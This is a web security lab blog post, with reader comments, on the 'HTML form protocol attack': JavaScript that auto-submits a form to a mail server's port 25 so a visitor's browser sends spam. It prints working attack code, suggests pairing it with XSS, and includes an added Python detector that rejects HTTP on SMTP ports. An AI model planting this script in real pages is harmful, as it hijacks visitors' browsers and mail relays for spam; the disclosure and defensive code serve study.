web application security lab

JavaScript Spam

Every once in a while I hear something that really gets my imagination going. A few weeks ago when Samy and I were having lunch, he told me about a way to send email through a browser using a form and an automatic form submission using JavaScript. While not new (there is an old, obscure paper about this dating back to 2001), it’s definitely not well known. Especially in this day and age, where JavaScript is coming under more scrutiny because of its malicious power, this could prove to be a really nasty thing in a spammer’s arsenal.

The only obstacle in a spammer’s way is knowing which mail servers will and won’t accept malformed input in this way (thus far it looks like sendmail works, but I haven’t had luck with Exchange or qmail). Here’s some sample code:

server='mail.server.com';
document.write('<form name="B" target="A" method="post" action="http://'+server+':25/" enctype="multipart/form-data">');
document.write('<textarea name="C"></textarea></form>');
s = 'HELO test\n';
s += 'EHLO test\n';
s += 'MAIL FROM:<test@hotmail.com>\n';
s += 'RCPT TO:<user@domain.com>\n';
s += 'DATA\n';
s += 'From: test@test.com\n';
s += 'To: test@test.com\n';
s += 'Subject: heh!\n';
s += 'testing 123\n\n';
s += '.\n\nQUIT\n\n';
document.B.C.value=s;
document.B.submit();

Combining this with XSS, and knowing the email address of the user visiting the page, can create ultra-targeted spam sent from that user. Why bother burning through your own IP space if you can get someone else to use theirs? Pretty ugly! Your mileage may vary in the calls themselves. I’d be interested to hear other people’s test results.
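The defender’s side of the technique described above, as an added example that is not part of the original post: a mail listener or a sensor watching port 25 can recognise a submission like the one above by its HTTP request line, reject it before any line is interpreted as SMTP, and record whether the body carried SMTP verbs (which distinguishes a form protocol attack from a stray browser hitting the port). The two sample sessions are constructed and the 554 reply text is an assumed wording.

```python
import re
from typing import List, Tuple

# Constructed sample of what a mail listener receives when the page's form is
# submitted: an HTTP POST whose multipart body carries the textarea contents.
SAMPLE_HTTP_SESSION = (
    b"POST / HTTP/1.1\r\n"
    b"Host: mail.server.com:25\r\n"
    b"Content-Type: multipart/form-data; boundary=----x\r\n"
    b"\r\n"
    b"------x\r\n"
    b'Content-Disposition: form-data; name="C"\r\n'
    b"\r\n"
    b"HELO test\nMAIL FROM:<test@hotmail.com>\nRCPT TO:<user@domain.com>\n"
    b"DATA\nSubject: heh!\n\ntesting 123\n\n.\n\nQUIT\n\n"
    b"------x--\r\n"
)
# Constructed sample of a legitimate client opening an SMTP session.
SAMPLE_SMTP_SESSION = b"EHLO client.example\r\nMAIL FROM:<a@example.com>\r\n"

# An HTTP request line: method, request-target, HTTP-version.
HTTP_REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/\d\.\d$")
# SMTP verbs at the start of a line; re.M so both CRLF and the bare LF
# produced by the page's script are recognised.
SMTP_VERB = re.compile(rb"^(HELO|EHLO|MAIL FROM:|RCPT TO:|DATA|QUIT)", re.M)

def is_http_request(first_line: bytes) -> bool:
    """True if the client's opening line is an HTTP request line, not SMTP."""
    return HTTP_REQUEST_LINE.match(first_line.rstrip(b"\r\n")) is not None

def smuggled_smtp_verbs(body: bytes) -> List[str]:
    """SMTP verbs found inside an HTTP request body; a non-empty list tells a
    defender this was a form protocol attack rather than a stray browser hit."""
    return [m.group(1).decode() for m in SMTP_VERB.finditer(body)]

def screen_session(data: bytes) -> Tuple[str, List[str]]:
    """Decide how an SMTP listener should treat a connection's first bytes.
    Returns ("reject", verbs) for HTTP traffic and ("accept", []) otherwise."""
    first_line, _, rest = data.partition(b"\n")
    if is_http_request(first_line):
        return "reject", smuggled_smtp_verbs(rest)
    return "accept", []

def smtp_reject_reply() -> bytes:
    """Permanent-failure reply (SMTP 554, assumed wording) sent before closing."""
    return b"554 HTTP request received on SMTP port; closing connection\r\n"
```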

9 Responses to “JavaScript Spam”

  1. Wladimir Palant Says:

    Yes, I came across this bug when I looked at port scanning. That was the report that caused Mozilla to close a number of well-known ports in the first place - https://bugzilla.mozilla.org/show_bug.cgi?id=83401 Note that the example there doesn’t even require JavaScript, a simple META Refresh will do.

  2. Sid Says:

    I tried using this against postfix on my localhost and when redirected to 127.0.0.1:25 Firefox gave me this:
    http://img363.imageshack.us/img363/9657/nosmtpformebp1.gif

    Opera, on the other hand, was fine with sending the request (the SMTP server didn’t send any emails though).

    This is a great idea though, if only I knew of a public smtp server that this worked on.

  3. Kyran Says:

    Yeah Sid, I think the hardest part is finding a suitable SMTP server.
    Although, if it’s supertargeted, you could probably use their ISP’s.

  4. Jungsonn Says:

    Haha yes, that’s an oldie. :) It’s nice to see those things revive!

    Results:

    Firefox 2.0: same as Sid.
    Internet Explorer 6.0: Works!

  5. kuza55 Says:

    AFAIK Anti-DNS Pinning still works, right?

    Because as long as that works, it doesn’t really matter if SMTP servers will accept HTTP traffic as if it were SMTP traffic, because we can create sockets.

    But if Anti-DNS Pinning is ever fixed, then this will most definitely become useful again.

  6. anon Says:

    “there is an old obscure paper about this” - Oh, come, come. The paper is “HTML Form Protocol Attack” (http://www.remote.org/jochen/sec/hfpa/hfpa.pdf), it’s not obscure - it’s very plain and focused. It was followed by a very clear CERT warning (http://www.kb.cert.org/vuls/id/476267) as well as a BugTraq BID (http://www.securityfocus.com/bid/3181/discuss).

  7. Another Sid Says:

    One could use form auto-fill to obtain email addresses from many people. http://homer.informatics.indiana.edu/cgi-bin/riddle/riddle.cgi

    Figuring out which relay server to use is harder, but perhaps can be done by looking at the REMOTE_HOST on the server, choosing an appropriate substring, and putting “mail” or “smtp” or “mail-relay” in front. Though this *does* make it harder to use XSS for deployment. One could also choose from a set of known open relays…

    Works in Safari 2.

  8. RSnake Says:

    @kuza55 - yes, that’s correct, anti-DNS pinning is definitely still in our arsenal at this moment.

    @anon - Yup, that’s the one. I’d still contend that it’s obscure since I couldn’t find it linked from anywhere that normally discusses this sort of thing (I think Amit Klein was the first person to show it to me), and it’s definitely old - 6 years is ancient history in this business. I hear people saying things that have been discussed weeks ago are old. But yes, that’s the one.

    @Another Sid - Good info. I hadn’t seen that cgi script before. Cute!

  9. Awesome AnDrEw Says:

    I’ve read somewhere that a lot of domains are unfairly blacklisted as spam outlets because of the ability to use PHP form mailers to mass mail others by appending CC and BCC to the message. I don’t have a lot of information on it though because I don’t set myself up to be raped like that.